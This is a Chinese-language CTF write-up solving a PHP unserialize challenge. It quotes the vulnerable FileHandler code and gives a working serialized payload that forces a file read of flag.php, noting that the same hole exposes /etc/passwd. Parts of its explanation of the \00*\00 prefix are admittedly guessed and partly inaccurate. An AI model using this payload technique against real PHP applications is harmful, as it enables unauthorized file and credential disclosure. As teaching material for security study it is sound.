进来题目先看到php代码审计，是反序列化漏洞

先看进来入口的逻辑，判断是不是正常的ascii码字符，然后反序列化，可以忽略校验，都是正常的

// 校验你是不是ascii码里面的合法字符
function is_valid($s) {
    for($i = 0; $i < strlen($s); $i++)
        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
            return false;
    return true;
}

// 接受变量然后校验，进行反序列化激活类
if(isset($_GET{'str'})) {

    $str = (string)$_GET['str'];
    if(is_valid($str)) {
        $obj = unserialize($str); // 反序列化
    }

}

接下来看一下生命周期函数和四大函数

看了一下只有读文件函数是有用的，那就要 $op=2 或者$op='2' 才行

    // 生命周期函数：初始化函数
    function __construct() {
        $op = "1";
        $filename = "/tmp/tmpfile";
        $content = "Hello World!";
        $this->process();
    }

    // 关键函数，当op等于2时候才进去正确的函数，读文件
    public function process() {
        if($this->op == "1") {
            $this->write();
        } else if($this->op == "2") {
            $res = $this->read();
            $this->output($res);
        } else {
            $this->output("Bad Hacker!");
        }
    }

    // 这个函数是废的，我们要读取文件找flag，不是来写东西进文件
    private function write() {

    }

    // 文件包含漏洞的函数，能读取所有的文件，包括/etc/passwd都能读取
    private function read() {
        $res = "";
        if(isset($this->filename)) {
            $res = file_get_contents($this->filename);
        }
        return $res;
    }
    // 打印出来
    private function output($s) {
        echo "[Result]: <br>";
        echo $s;
    }

$op 等于整数 2 即可，$filename等于 flag.php 即可，不需要 fuzz 

比赛的现场题目是需要fuzz或者寻找一些配置文件来探索flag文件在哪里的

反正权限贼高，能读到 /etc/passwd

class FileHandler {

    public $op = 2;
    public $filename = "flag.php";
    public $content = "aaa";


}

$obj = new FileHandler();
echo serialize($obj);

// 最后生成如下
O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:8:"flag.php";s:7:"content";s:3:"aaa";}

需要改动一下

改动1：把小写s改成大写S

改动2：在op前面增加\00*\00，因为私有属性是会自带 * 号，需要用\00来截断（原理不清楚）

奇怪的地方：$op是整数2，不能是字符串的2，很奇怪，明明字符串的2也可以啊

改好后最终答案如下

O:11:"FileHandler":3:{S:5:"\00*\00op";i:2;S:11:"\00*\00filename";S:8:"flag.php";S:10:"\00*\00content";S:3:"aaa";}

flag{5f3275d0-e4ee-4faa-b72c-8c129a7c3400}